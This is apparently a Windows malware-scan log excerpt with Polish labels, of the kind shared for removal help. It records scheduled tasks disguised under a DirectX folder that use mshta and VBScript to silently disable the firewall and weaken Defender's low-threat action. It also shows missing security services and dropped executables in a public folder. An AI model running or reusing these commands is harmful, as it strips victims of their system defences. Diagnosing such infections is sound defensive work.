Task: {FB759ED7-C0AB-432D-8984-A21374B20B8B} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall3 => mshta.exe vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close)
Task: {FF217854-84F6-4433-A0F2-11B7A0F878FD} - System32\Tasks\Microsoft\Windows\DirectX\LowThreatDefaultAction => mshta.exe vbscript:CreateObject("WScript.Shell").Run("powershell Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore",0)(Window.Close)
S3 WinRing0_1_2_0; C:\Users\danie\AppData\Local\Temp\tmpFF71.tmp [14544 2022-10-31] (Noriyuki MIYAZAKI -> OpenLibSys.org) <==== UWAGA
U4 MsSecFlt; Brak ImagePath
U4 SecurityHealthService; Brak ImagePath
U4 Sense; Brak ImagePath
2022-11-03 19:50 - 2022-11-03 20:10 - 000782208 _____ (www.sordum.org) C:\Users\Public\d.exe
2022-11-03 19:34 - 2022-11-03 19:34 - 000053248 _____ () C:\Users\Public\b.exe
2022-11-02 18:10 - 2022-11-03 20:11 - 000000266 __RSH C:\ProgramData\ntuser.pol
